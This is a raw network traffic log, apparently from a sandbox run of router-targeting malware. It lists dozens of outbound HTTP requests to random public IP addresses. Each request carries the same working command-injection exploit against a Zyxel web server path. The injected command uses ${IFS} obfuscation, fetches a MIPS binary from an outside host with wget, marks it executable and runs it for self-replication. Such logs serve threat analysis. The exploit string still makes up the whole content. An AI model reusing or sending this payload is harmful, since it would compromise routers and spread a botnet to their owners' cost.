                                                  Jan 19, 2024 18:23:22.641608953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  433192.168.2.135260685.22.171.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:23.646375895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  434192.168.2.1348948125.51.248.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:23.646424055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  435192.168.2.1335730177.107.59.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:23.646473885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  436192.168.2.1351726141.111.109.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:23.646486998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  437192.168.2.1342606139.165.123.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:23.646542072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  438192.168.2.135371836.212.35.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:23.646579027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  439192.168.2.1347178201.155.144.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:23.646625042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  440192.168.2.1341570186.95.65.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:23.646657944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  441192.168.2.1338542221.202.212.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:23.646672964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  442192.168.2.1336304102.187.53.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:23.646733046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  443192.168.2.1350572136.30.132.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:23.646753073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  444192.168.2.1350570188.206.135.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:23.646831989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  445192.168.2.134743071.28.145.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:23.647030115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  446192.168.2.135226094.146.197.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:24.650855064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  447192.168.2.1360064218.209.26.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:24.650921106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  448192.168.2.1360648109.21.172.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:24.650988102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  449192.168.2.1333652164.214.149.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:24.651041985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  450192.168.2.1343460146.212.85.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:25.655065060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  451192.168.2.136090027.226.91.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:25.655105114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  452192.168.2.1359420193.109.215.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:25.655133009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  453192.168.2.1354414196.63.97.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:25.655180931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  454192.168.2.1355578201.36.193.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:25.655185938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  455192.168.2.1341470163.135.160.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:25.655234098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  456192.168.2.1334062104.179.229.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:25.655308008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  457192.168.2.135679279.22.165.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:25.655459881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  458192.168.2.135708480.232.15.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:25.655468941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  459192.168.2.1351744201.180.55.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:25.655468941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  460192.168.2.1336868200.79.220.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:25.655468941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  461192.168.2.1344952120.7.230.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:25.655476093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  462192.168.2.1342996185.81.166.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:25.655476093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  463192.168.2.135185274.67.226.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:25.655495882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  464192.168.2.133387494.149.153.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:25.655560017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  465192.168.2.134710071.221.101.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:25.655611992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  466192.168.2.135444891.247.232.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:25.655613899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  467192.168.2.133640272.238.164.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:25.655698061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  468192.168.2.1338810190.1.125.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:25.655730009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  469192.168.2.133282845.129.85.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:25.655781984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  470192.168.2.1353246121.57.81.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:25.655828953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  471192.168.2.135627214.188.217.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:25.656264067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  472192.168.2.1333364157.249.170.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.660470963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  473192.168.2.1337436106.156.35.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.660511017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  474192.168.2.1352740178.14.64.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.660525084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  475192.168.2.135317675.208.183.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.660543919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  476192.168.2.1341256199.151.17.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.660578012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  477192.168.2.133619637.202.124.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.660619974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  478192.168.2.1338890203.203.35.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.660677910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  479192.168.2.1345304136.173.253.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.660695076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  480192.168.2.135440024.107.185.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.660743952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  481192.168.2.134462470.92.147.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.660784960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  482192.168.2.1354596195.45.21.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.660828114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  483192.168.2.1339108139.74.69.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.660870075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  484192.168.2.134661217.45.134.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.660896063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  485192.168.2.1344668105.80.51.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.660932064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  486192.168.2.134702247.225.94.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.660970926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  487192.168.2.135653818.224.140.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.660993099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  488192.168.2.134925027.194.136.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661025047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  489192.168.2.1337656193.122.85.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661076069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  490192.168.2.134229658.199.226.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661104918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  491192.168.2.1341196165.64.164.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661154985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  492192.168.2.1337574151.190.92.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661190987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  493192.168.2.133966242.207.190.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661214113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  494192.168.2.1357002143.225.188.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661271095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  495192.168.2.134133214.169.178.234443
                                                  TimestampBytes transferredDirectionData
